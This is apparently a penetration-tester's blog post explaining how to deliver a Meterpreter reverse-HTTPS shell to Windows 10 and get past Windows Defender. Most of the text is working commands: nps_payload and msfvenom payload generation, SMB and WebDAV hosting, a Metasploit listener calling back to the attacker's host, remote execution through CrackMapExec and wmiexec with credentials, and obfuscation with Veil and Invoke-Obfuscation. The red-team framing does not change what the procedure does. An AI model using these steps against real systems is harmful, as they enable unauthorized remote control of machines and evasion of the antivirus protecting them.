Executing Meterpreter on Windows 10 and Bypassing Antivirus

June 26, 2018, Esteban Rodriguez, Consultant, Coalfire Labs, Coalfire

One of my Labs colleagues recently published an article on the Coalfire Blog about executing an obfuscated PowerShell payload using Invoke-CradleCrafter. This was very useful, as Windows Defender has upped its game lately and is now blocking Metasploit’s Web Delivery module. I wanted to demonstrate an alternate way to achieve the same goal, without dropping any files on the host system while providing more options depending on what ports can egress the network.

To generate the payload, I decided to go with nps_payload created by Ben Ten and Spoonman1091. It applies SubTee’s method of using Msbuild.exe, which also bypasses many Application Whitelisting (AWL) configurations.

When executed, Msbuild writes multiple files into C:\Users\[USER]\AppData\Local\Temp\[RANDOM]\. It will clean up and delete these files after executing.

To download nps_payload, perform the following steps:

git clone https://github.com/trustedsec/nps_payload.git
cd nps_payload/
pip install -r requirements.txt
python nps_payload.py

Type “1” to select Generate msbuild/nps/msf payload

Then type “3” to choose windows/meterpreter/reverse_https

This will output the file msbuild_nps.xml.

Rename it if you want. To deliver it to the target, we will put it on an SMB share on our host.

To stand up the SMB share, perform the following steps:

apt-get install samba
cd /etc/samba/
vi smb.conf

Go ahead and add:

[Guest]
comment = Guest
path = /tmp/share/
browseable = yes
read only = yes
guest ok = yes

to the bottom of smb.conf. Copy your payload to the directory you specified for the path.

mkdir /tmp/share
cp ~/nps_payload/msbuild_nps.xml /tmp/share/

Now that the payload is on the SMB share, the next thing to do is stand up a Metasploit listener if you do not have one running yet.

msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 192.168.xxx.xxx
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit -j

You can also use the msbuild_nps.rc file that is generated by nps_payload. Make sure your LPORT and LHOST match what you provided to nps_payload.

To execute the file on the remote host, you have multiple choices. If you have an RDP connection to the host, just paste this command to the command prompt:

%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
\\192.168.137.133\Guest Share\msbuild_nps.xml

You should be able to execute this remotely over the network using common command exec tools.

CrackMapExec:

crackmapexec smb 192.168.137.1 -u Administrator -p Password123 -x
'%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
\\192.168.137.133\Guest\msbuild_nps.xml'

Impacket’s wimiexec.py:

python wmiexec.py Adminstrator:Password123@192.168.137.1 cmd.exe /c start
%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
\\192.168.137.133\Guest\msbuild_nps.xml

When testing, I had a bit of trouble getting these to execute, so I thought of a better way to deliver the payload instead of using SMB. I decided to use WebDAV.

Why WebDAV? Here’s the interesting thing about UNC paths. Windows will first try to reach the host over SMB on port 445. If it cannot, it will try to use WebDAV on port 80, which is useful for a few reasons:

  1. SMB is often blocked at the firewall. If we want to pull the payload from a remote system, this may not work because port 445 is blocked.
  2. As of CrackMapExec version 4, it needs an SMB server running on port 445 to execute commands. We cannot use both our Samba share and CME on the same host at the same time.
  3. WebDAV can also go over HTTPS if network-based detection is a concern.

There are a bunch of ways to set up a WebDAV server. While you can do it with Apache, I chose to use a Python tool named WsgiDAV to create one for me.

You can install it with pip by simply typing:

pip install WsgiDAV

To use it, run the commands:

pip install wsgidav cheroot
wsgidav --host=0.0.0.0 --port=80 --root=/tmp

For this example, I put my payload in the /tmp/ directory within a folder named “test.

To execute the payload remotely, we run a very similar command:

CrackMapExec:

crackmapexec smb 192.168.137.1 -u Administrator -p Password123 -x
'%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
\\192.168.137.134\Davwwwroot\test\msbuild_nps.xml'


click to enlarge image

Impacket’s wimiexec.py:

python wmiexec.py Administrator:Password123@192.168.137.1
C:\>%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
\\192.168.137.134\Davwwwroot\test\msbuild_nps.xml


click to enlarge image

To use WebDAV with SSL/TLS, check out this post from TrustedSec: How to Set Up a Quick, Simple WebDAV Server for Remote File Sharing.

A quick note on WebDAV: Files pulled from WebDAV are not “disk-less.” You can find them at C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV. While this may seem to be less preferable than using SMB, the advantages of firewall egress and CrackMapExec compatibility may prove to be more valuable.

Note: I had issues connecting to my WebDAV server on Kali from my Windows host after a reboot of Kali Linux. To fix it, I simply started and stopped Samba.

Nps_payload will get picked up by most AV using the default options, as it uses msfvenom on the backend to generate the PowerShell code that gets executed. There are a couple additional evasion steps that can be taken to ensure your payload does not get blocked.

Using Veil:

This starts from the assumption that you already have Veil installed, and that you already created an msbuild_nps.xml file using nps_payload.

Run Veil using the following options:

This will give you a payload.bat file. Depending on the architecture of the target, we will copy the relevant command. Below I have highlighted the x64 option.


click to enlarge image

From this, strip out the slashes from the \” within the payload (there are two of them). This escaping is needed when pasting on the Windows command line, but we don’t need it for what we are going to do.

This needs to be base64 encoded now. An easy way is to paste it into a file, and run:

cat FILENAME.txt | base64 -w 0

Take that base64 output and replace the cmd string within your msbuild_nps.xml file. Make sure you don’t overwrite the closing quotation mark or semicolon.


click to enlarge image

Alternatively, you can just run nps_payload again and supply your FILENAME.txt as input using option 4, Custom PS1 payload.

There you go! No more grumpy Windows Defender.

Using Invoke-Obfuscation:

First, pull down Invoke-Obfuscation on a system that has PowerShell. This will run on one of your systems, not the target. Windows Defender might get mad at you:

In my case it ended up letting me run it anyway.

To get your initial PowerShell script, you can just use msfvenom in the same way nps_payload does:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.137.134 LPORT=443 --arch x86 --platform win -f psh -o msf_payload.txt


click to enlarge image

I hosted this over HTTP with Python’s simple HTTP server module. This will help us pull it into Invoke-Obfuscation.

Using Invoke-Obfuscation we will feed it our PowerShell script like so:

Invoke-Obfuscation> SET SCRIPTPATH http://192.168.137.134:8000/msf_payload.txt

Use any method you like to obfuscate, I used “Token ALL”.

Invoke-Obfuscation> TOKEN\ALL\1

You should get something that looks like this:


click to enlarge image

This is your PowerShell script. You can now feed this into nps_payload as a new file when invoking option 4, Custom PS1 payload.

Using the forked version of nps_payload from Franci Šacer:

Go and download his version from https://github.com/fsacer/nps_payload.

Choose “Generate msbuild/nps/msf CSharp payload

Follow the same steps as before. This does not use PowerShell at all, which keeps it from getting detected in the same way as the other methods.

And that’s it! Just a few ways to get your Meterpreter shell running on the latest version of Windows running Windows Defender.

Esteban Rodriguez

Author

Esteban Rodriguez — Consultant, Coalfire Labs, Coalfire

Recent Posts

Post Topics

Archives

Top